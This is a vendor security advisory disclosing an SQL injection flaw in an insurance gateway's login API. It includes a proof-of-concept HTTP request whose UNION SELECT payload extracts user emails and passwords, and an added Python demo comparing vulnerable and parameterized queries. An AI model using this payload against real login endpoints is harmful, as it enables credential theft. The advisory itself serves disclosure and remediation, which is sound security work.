Security Advisory 2004-01

SQL Injection in Login API Endpoint

Overview

Advisory ID: TRSA-2004-01
Advisory version: 1.0
Advisory status: Public
Advisory URL: https://trovent.io/security-advisory-2004-01
Affected product: Web application https://production.gateway.insure
Affected version: N/A
Vendor: Hepstar Financial Services (Pty) Ltd, https://www.hepstar.com
Credits: Trovent Security GmbH, Stefan Pietsch

Detailed Description

Trovent Security GmbH discovered an SQL injection vulnerability in a web
application of Hepstar. The login endpoint concatenates the submitted username
into an SQL statement, so an unauthenticated attacker can execute SQL commands
through it. It is possible to read data from all tables of the database.

Severity: Critical
CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVE ID: N/A
CWE ID: CWE-89

Note: Trovent Security GmbH did not perform a penetration test of the web application.

Proof of Concept

Sample HTTP request used to verify the vulnerability:

POST /authentication/rest/login HTTP/1.1
Host: production.gateway.insure
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
Connection: close

username=x'%20UNION%20SELECT%20SUBSTRING(GROUP_CONCAT(email,'|',password),1,1024),11,11,12345,11,11%20FROM%20security_user--%20-&password=y

Solution / Workaround

Application source code has to be modified to fix the vulnerability: user input
must not be concatenated into SQL statements. The login query should bind the
username and password as parameters of a prepared statement instead.
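The following is an added example, not Hepstar's code and not part of the
original advisory. It reproduces the injection pattern from the proof of
concept against an in-memory SQLite table and shows the same login query with
bound parameters rejecting the payload. The column layout of security_user, the
six-column login SELECT (chosen to match the six values in the UNION payload),
the sample rows and the SQLite spelling of the payload (substr and a
two-argument group_concat instead of MySQL's SUBSTRING and three-argument
GROUP_CONCAT) are assumptions.

```python
import sqlite3

# Constructed sample data (not from the advisory). The table name and the
# email/password columns follow the PoC; the remaining columns are assumed.
SAMPLE_USERS = [
    (1, "alice", "hash_of_alice_pw", "alice@example.com", "user", 1),
    (2, "bob", "hash_of_bob_pw", "bob@example.com", "admin", 1),
]

# The advisory's payload, URL-decoded and adapted to SQLite syntax:
# MySQL GROUP_CONCAT(email,'|',password) -> group_concat(email || '|' || password)
# MySQL SUBSTRING(x,1,1024)              -> substr(x,1,1024)
# The six selected values must match the column count of the login query,
# and the trailing "-- -" comments out the rest of the original statement.
INJECTED_USERNAME = (
    "x' UNION SELECT substr(group_concat(email || '|' || password),1,1024),"
    "11,11,12345,11,11 FROM security_user-- -"
)

# Assumed column list of the login query (six columns, as the payload implies).
LOGIN_COLUMNS = "username, password, email, id, role, active"


def make_db():
    """Create an in-memory database with the constructed security_user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE security_user ("
        "id INTEGER PRIMARY KEY, username TEXT, password TEXT, "
        "email TEXT, role TEXT, active INTEGER)"
    )
    conn.executemany(
        "INSERT INTO security_user VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_USERS
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string formatting (the CWE-89 pattern).

    A single quote in `username` closes the literal; everything after it is
    parsed as SQL. Returns the first column of the matching row, which is the
    slot the UNION payload uses to carry the concatenated email|password pairs
    back to the attacker.
    """
    sql = (
        f"SELECT {LOGIN_COLUMNS} FROM security_user "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Same query with bound parameters.

    The driver sends the values separately from the statement text, so the
    payload is compared as an ordinary (and non-existent) username.
    """
    sql = (
        f"SELECT {LOGIN_COLUMNS} FROM security_user "
        "WHERE username = ? AND password = ?"
    )
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", login_vulnerable(db, INJECTED_USERNAME, "y"))
    print("parameterized:", login_parameterized(db, INJECTED_USERNAME, "y"))
    print("legit login  :", login_parameterized(db, "alice", "hash_of_alice_pw"))
```

Against the vulnerable function the payload returns every email|password pair
of the table in one string even though no user named "x" exists; the
parameterized function returns nothing for the same input and still
authenticates a genuine username/password pair.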

History

2020-04-17: Vulnerability found, vendor contacted
2020-04-20: Vendor replied, asking for details
2020-04-21: Vulnerability details reported to vendor
2020-04-22: Trovent verified remediation of the vulnerability
2020-05-16: Advisory published